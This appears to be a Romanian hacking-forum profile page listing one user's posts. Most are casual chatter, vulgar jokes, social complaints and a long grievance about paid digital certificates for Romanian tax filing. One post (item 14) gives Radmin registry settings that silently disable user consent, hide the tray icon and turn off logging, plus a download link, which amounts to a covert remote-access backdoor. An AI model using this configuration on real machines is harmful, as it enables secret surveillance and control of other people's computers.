Jump to content

datdraq

Active Members
  • Posts

    124
  • Joined

  • Last visited

Everything posted by datdraq

  1. datdraq

    Leeer

    Cand Hrusca e racit se amana Craciunul
  2. Pentru ca eu sunt familiarizat deja cu acesti termeni si nu pun intrebari de genul " cum sparg parola de messenger a vecinului ". Bineinteles ca moderatorii vor fi numiti dintre userii de aici pentru a le explica anumite lucruri juniorilor .
  3. Eu propun pentru rezolvarea problemei urmatoarele : 1)Faceti un forum RST-JUNIOR care sa cuprinda numai informatii de baza , de ex : --- ce este un trojan ---ce este un keylogger --- ce este google --- etc 2)Inchideti inregistrarile aici . 3)Userii noi se inscriu pe RST-JUNIOR ,fac 100 postari . Daca scapa de ban primesc automat o invitatie pe forumul mare (aici) . off: Rst junior , ce penal suna
  4. Asta-i topic de zgandarit si de observat reactii . Daca e real ce spui ,mergi la un psiholog . Daca nu e real , mergi la un psiholog .
  5. La multi ani ma baieti , sa fiti sanatosi sa faceti contu gras . Tot ce va doriti in 2011 !!! V-am pupat !
  6. Nu stii ca sunt smekercudoide_sm ?
  7. Multumesc , la multi ani si voua !
  8. Macar un fierastrau si tot facem .
  9. La multi ani iubi , sa fi cumintica .
  10. Esti nebun sa-mi bag pula
  11. Pentru ca democratia a fost inteleasa gresit . Pentru ca ati avut ghinion sa va nasteti in aceasta perioada . Pentru ca pe nimeni nu intereseaza nimic inafara de bani . Pentru ca suntem saraci . Pentru ca parintii se cearta incontinuu ca nu au bani si factura la gaz e 4 milioane. Pentru ca nu mai exista respect . Pentru ca nu va ganditi niciodata in pula mea la viitor .
  12. Mi-ar placea sa nu mai fim dependenti de sangele unei fiinte vii .
  13. Luam viata animalelor ca sa ne satisfacem foamea si scriem in biblie ca asa a lasat D-zeu ca sa ne gasim o scuza . Mai facem si un spectacol din asta (vezi obiceiurile de la tara cu taiatul porcului ) . Suntem rasa "superioara" , vai de pula noastra , asa o sa fim si noi la randul nostru sacrificati . Cine refuza sa bage cutitul in porc e considerat "fetita" . Cine baga cutitul in animale si umple curtea de sange e considerat "barbat" . Trist . Daca vedeti cum se taie o vaca /cal in abator nu o sa mai mancati niciodata carne .De miei nu mai zic .
  14. Radmin ! Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] "AskUser"=hex:00,00,00,00 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] "NTAuthEnabled"=hex:00,00,00,00 "Parameter"=hex: d4,db,5b,ce,7f,cc,6f,7d,0a,c7,e8,68,e8,7f,64,3e "Port"=hex:f6,09,00,00 "Timeout"=hex:0a,00,00,00 "EnableLogFile"=hex:00,00,00,00 "LogFilePath"="c:\\logfile.txt" "FilterIp"=hex:00,00,00,00 "DisableTrayIcon"=hex:01,00,00,00 "EnableEventLog"=hex:00,00,00,00 http://www.multiupload.com/EVIL71PK4L Extrageti cu winrar -->show hidden files ,folders and drivers .
  15. Felicitarile se dau pentru realizari . A fi administrator nu e o bucurie/realizare , e o bataie de cap /obligatie .
  16. Cand a aparut galbenu' mi s-a sculat pula .
  17. La un prieten , ne revergoram cu o grasa .
  18. Manelele si Nelu Ploiesteanu merg la sprit . Parerea mea e ca se face prea mult tam-tam pe acest subiect . Fiecare asculta ce vrea si ce-i place .Nu are legatura cu nivelul de inteligenta sau treapta sociala pe care te situezi . Victoras Ponta asculta in masina Parazitii dupa care merge in parlament .
  19. datdraq

    buna

    Noroc ! Saluta mai barbateste asa ca se face coada la curu tau .
  20. Am fost destul de clar . Oricat de ciudat ti s-ar parea , nu toti userii acestui forum au 15 ani . Oricum nu asta e important , esenta problemei era alta .
  21. O completare foarte importanta , în Slovacia o astfel de semn?tur? electronic? cost? 8 euro .
  22. Pentru ca traim in Romania orice pas inainte facut impotriva birocratiei ascunde o mare afacere . Povestea incepe undeva la inceputul anului 2010 dupa Hristos .... Pe toate televiziunile apar niste reclame agresive care ne ofereau certificate digitale . Spun agresive pentru ca de cate ori deschideam televizorul auzeam numai expresii care se terminau in "sign" . La vremea respectiva nu le-am dat prea multa importanta dar parca mi s-a parut ciudata insistenta cu care faceau reclama , mai ales stiind ca reclama costa bani ( multi) . Trece vremea ... trece ..trece si ajungem la sfarsitul anului 2010 , tot dupa Hristos . Cam pe 16-17 decembrie sunt placut surprins de o stire din care am aflat ca incepand cu anul 2011 / februarie , declaratiile contribuabililor care pana acum se depuneau in fiecare luna la finante , somaj , casa de pensii , casa de sanatate se vor depune intr-un singur loc , respectiv la finante si vor fi comasate intr-o singura declaratie .Mai mult ,aceasta declaratie se depune on-line . Avand o societate comerciala de prin 1996 , pentru mine vestea asta a fost cel mai frumos cadou de craciun .Nu-mi vine sa cred , nu voi mai sta in fiecare luna la niste cozi interminabile , nu voi mai fi umilit de tot felul de babe intrate la menopauza prea devreme , nu o sa-mi mai spuna nimeni "e defecta discheta" pentru ca rasnitele lor de pc-uri nu au slot pentru stik ....etc . Toate bune si frumoase , incep sa ma interesez ce si cum trebuie sa fac ca sa transmit on-line declaratia . Aici incepe hotia : Ca sa depuna declaratia asta , fiecare firma sau persoana fizica trebuie sa detina un certificat digital ( cel caruia i se facea reclama ) . Certificatul asta digital costa 56 de euro fara TVA si e valabil un an . In fiecare an trebuie reinnoit cu 30 de euro fara TVA . O firm? este nevoit? s? aib? cel pu?in 3 semn?turi pentru a nu-i fi blocat? activitatea . Pe site-ul ANAF aflu ca doar trei societati comerciale sunt acreditate sa ofere astfel de certificate , respectiv : certsign , digisign ,transspeed . Parca imi suna conoscute numele astea .....aaa da , le-am auzit in reclame la inceputul anului . Cautand pe google aflu ca in Romania sunt inregistrate cca 2 milioane de societati comerciale . La o socoteala simpla imi dau seama ca asta este o afacere de 112 milioane de euro fara TVA + anual inca 60 milioane de euro fara TVA pe o perioada NEDETERMINATA . In aceasta socoteala nu am inclus persoanele fizice pentru ca nu le cunosc numarul .Am socotit un singur certificat de caciula , nu trei . Intrebarea mea de final este : a cui credeti ca este aceasta afacere ?
×
×
  • Create New...